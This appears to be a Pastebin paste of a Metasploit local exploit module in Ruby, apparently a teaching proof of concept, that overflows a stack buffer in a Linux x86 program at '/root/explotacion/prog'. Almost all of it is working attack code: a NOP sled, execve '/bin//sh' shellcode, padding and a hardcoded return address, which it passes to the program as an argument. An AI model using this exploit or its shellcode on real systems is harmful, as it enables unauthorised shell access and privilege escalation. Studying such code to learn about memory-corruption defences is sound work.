Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- require 'msf/core'
- require 'rex'
- class Metasploit3 < Msf::Exploit::Local
- Rank = ExcellentRanking
- def initialize(info={})
- super( update_info( info, {
- 'Name' => 'PoC BOF',
- 'Description' => ‘Ejemplo de explotación BOF',
- 'License' => MSF_LICENSE,
- 'Author' => [ 'nodoraiz', 'Miguel Angel Garcia' ],
- 'Platform' => [ 'linux'],
- 'Arch' => [ ARCH_X86 ],
- 'SessionTypes' => [ 'shell', 'meterpreter' ],
- 'Targets' =>
- [
- [ 'Linux x86', { 'Arch' => ARCH_X86 } ]
- ],
- 'DefaultTarget' => 0,
- 'Payload' => { Space => 23 }
- }
- ))
- register_options([
- OptString.new("exec_file", [ true, "Path to executable", "/root/explotacion/prog" ]),
- ], self.class)
- end
- def exploit
- junk_space = 21
- nops_space = 4
- path = datastore["exec_file"]
- nops = "\x90" * nops_space
- shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
- junk = "A" * (junk_space - nops_space)
- eip = "\x50\xf2\xff\xbf"
- exec path + " " + nops + shellcode + junk + eip
- end
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement